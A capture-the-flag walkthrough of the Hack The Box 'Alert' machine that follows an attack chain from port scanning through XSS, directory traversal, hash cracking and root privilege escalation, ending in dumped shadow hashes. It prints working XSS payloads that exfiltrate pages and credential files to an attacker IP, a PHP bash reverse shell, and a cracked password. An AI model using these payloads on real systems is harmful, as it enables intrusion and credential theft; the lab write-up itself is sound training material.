HTB-Alert

Box Info

Difficulty	Easy
OS	Linux
IP Address	10.10.11.44

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.44 -r 1-65535 --ulimit 5000 | tee res
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.44 -sCV -Pn -sT -p22,80
# Nmap scan vulnerability 
sudo nmap -sT -p22,80 --script=vuln -O -Pn 10.10.11.44
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.44

PORT     STATE    SERVICE  VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
|_  256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://alert.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Update DNS

sudo nano /etc/hosts
sudo echo "10.10.11.44 alert.htb" | tee -a /etc/hosts

Service Enumeration

80/tcp HTTP

http://alert.htb is a markdown viewer.

Directory brute force check

**# Website is using php extensions
gobuster dir -u http://alert.htb -w /usr/share/wordlists/dirb/common.txt -x php,txt -t 50**

So there is a messages.php which dont shows in the websites, however it is just an empty page. Hidden?

Subdomain brute force check

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://alert.htb/ -H "Host: FUZZ.alert.htb" -fw 20

Here we found a statistics subdomain. Lets add into /etc/hosts

When trying access to the statistics.alert.htb it had a HTTP Basic Authentication in the first security layer.

File upload check

I try upload pentest-monkey.php file into the server and it shows the error only .md file accepted

Markdown viewers often vulnerable to XSS. So let’s try something simple to test it. Create a simple payload and named it into test.md

<script>
		alert(1)
</script>

And the results show positive.

Access to whitelist page via XSS

From the About us page, there is a message mentioning web administrator is in charge of reviewing contact messages. Means we just send a XSS payload to web admin via “Contact Us” page and capture the /messages.php page and send the result back to KALI

page.md

<script>
fetch("http://alert.htb/messages.php")
.then(response => response.text())
.then(data => {fetch("http://10.10.14.105:1234/?file_content=" + encodeURIComponent(data));});
</script>

Upload page.md to the Markdown viewer and obtain the share link by clicking the Share Markdown button on bottom right. Then send the message to the administrator

nc -lvnp 1234

From the results of netcat listener.

Lets decode the strings

<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>

From this messages seems like there is a .txt file we can read from messages.php, so I modified the page.md like following

<script>
fetch("http://alert.htb/messages.php?file=2024-03-10_15-48-34.txt")
.then(response => response.text())
.then(data => {fetch("http://10.10.14.105:1234/?file_content=" + encodeURIComponent(data));});
</script>

Content of the file is meaningless.

Directory Traversal

Since we can abuse XSS to read the file, what if we can use it to fetch some other files like /etc/passwd and the answer is no

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../../../../etc/passwd")
.then(response => response.text())
.then(data => {fetch("http://10.10.14.105:1234/?file_content=" + encodeURIComponent(data));});
</script>

From the initial recon, website is running on Apache httpd 2.4.41 where we can get the Apache config files via directory traversal. According to the digital ocean we can get the config files from /etc/apache2/sites-available/000-default.conf

# Found a better script
<script>
    var url = "messages.php?file=../../../../../../../etc/apache2/sites-available/000-default.conf"
    var attacker = "http://10.10.14.105:1234/exfil"
    var xhr = new XMLHttpRequest()
    xhr.onreadystatechange = function () {
      if (xhr.readyState == XMLHttpRequest.DONE) {
        fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
      }
    }
    xhr.open("GET", url, true)
    xhr.send(null)
</script>

From the config file found the AuthUserFile path, lets repeat the same way to obtain file

<script>
    var url = "messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd"
    var attacker = "http://10.10.14.105:1234/exfil"
    var xhr = new XMLHttpRequest()
    xhr.onreadystatechange = function () {
      if (xhr.readyState == XMLHttpRequest.DONE) {
        fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
      }
    }
    xhr.open("GET", url, true)
    xhr.send(null)
</script>

Bingo! Here we got the user albert and its hash

albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/

Initiate User Foothold

Based on the hash we found on previous steps, lets identify and decode it

hashcat -m 1600 --force albert.hash /usr/share/wordlists/rockyou.txt

Here we owned the password is manchesterunited

ssh albert@alert.htb -o StrictHostKeyChecking=no 
cat user.txt

Privilege Escalation

Linpeas

Lets upload linpeas and check what can we get

scp -o StrictHostKeyChecking=no linpeas.sh albert@alert.htb:/tmp 
chmod 755 linpeas.sh
bash linpeas.sh

╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes 
root         987  0.0  0.0   6816  3024 ?        Ss   09:14   0:00 /usr/sbin/cron -f
root         999  0.0  0.0   8360  3384 ?        S    09:14   0:00  _ /usr/sbin/CRON -f
root        1005  0.0  0.0   2608   600 ?        Ss   09:14   0:00  |   _ /bin/sh -c /root/scripts/php_bot.sh
root        1007  0.0  0.0   6892  3196 ?        S    09:14   0:00  |       _ /bin/bash /root/scripts/php_bot.sh
root        1012  0.0  0.0   2636   732 ?        S    09:14   0:00  |           _ inotifywait -m -e modify --format %w%f %e /opt/website-monitor/config
root        1013  0.0  0.0   6892  1904 ?        S    09:14   0:04  |           _ /bin/bash /root/scripts/php_bot.sh
root       44980  0.0  0.0   5476   576 ?        S    14:36   0:00  |               _ /usr/bin/sleep 3
root        1000  0.0  0.0   8360  3376 ?        S    09:14   0:00  _ /usr/sbin/CRON -f
root        1006  0.0  0.0   2608   592 ?        Ss   09:14   0:00      _ /bin/sh -c /root/scripts/xss_bot.sh
root        1008  0.0  0.0   6892  3204 ?        S    09:14   0:00          _ /bin/bash /root/scripts/xss_bot.sh
root        1009  0.0  0.0   2636   732 ?        S    09:14   0:00              _ inotifywait -m -e create --format %w%f %e /var/www/alert.htb/messages --exclude 2024-03-10_15-48-34.txt
root        1010  0.0  0.0   6892  1916 ?        S    09:14   0:00              _ /bin/bash /root/scripts/xss_bot.sh
root         995  0.0  0.6 207256 26328 ?        Ss   09:14   0:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor
root        2569  0.0  0.0   2608   592 ?        S    09:39   0:00  _ sh -c /bin/bash -c 'bash -i >/dev/tcp/10.10.14.29/6969 0>&1'
root        2570  0.0  0.0   6892  3140 ?        S    09:39   0:00      _ /bin/bash -c bash -i >/dev/tcp/10.10.14.29/6969 0>&1
root        2571  0.0  0.1   7236  4012 ?        S    09:39   0:00          _ bash -i
root        1003  0.0  0.5 396748 21420 ?        Ssl  09:14   0:06 /usr/bin/python3 /usr/bin/fail2ban-server -xf start

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                       
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/opt/website-monitor/config/configuration.php
/opt/website-monitor/monitors/alert.htb
/opt/website-monitor/monitors/statistics.alert.htb

╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 18913 Mar 10  2024 /var/backups/backup.zip

Here we found a interesting port, from the PS process can see it is run by root as website monitor in port 8080. We can use SSH to local port forwarding to our KALI machine.

ssh -L 8080:127.0.0.1:8080 albert@alert.htb

Under the **/opt/website-monitor**directory there is monitors folder with 777 permission and owned by root user

Create a reverse shell under this folder

cute.php

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.105/80 0>&1'"); ?>

Execute the reverse shell

nc -lvnp 8888
curl http://127.0.0.1:8080/monitors/cute.php

Initiate Root Foothold

# Upgrade TTY
**python3 -c 'import pty; pty.spawn("/bin/bash")'

cd
ls
cat root.txt**

root:$6$gSjyQo8nJFMsegNG$jRRGms4KAq1FGTXwBJl236Ui5OKRtmaM3k8nkXuvduPXnhhaT/ZCYHHYO3GxhUAik1NaFYlBGaQZBrzQHgOhc/:19791:0:99999:7:::
albert:$6$ITP6P5Et1oVKsi7t$kEwgQPb4LUVcYb9MDHklHWKwDPvE6l7TGBUZogMvPoHUDt2IZ0ONlWODbsiTFdwd7SkYUNHGA0QS.Bnd6/tsp0:19822:0:99999:7:::
david:$6$oYlviwCQ3SMghmp.$95V3x9QjaD5GU8yoFsb8ufq9GrJ7PtcMAilTYtiNN2RZsVG0qgiWXUdlDURqdE84Nk2T11F4BpJXz3FbEK3bC1:20008:0:99999:7:::

References

Simple Data Exfiltration Through XSS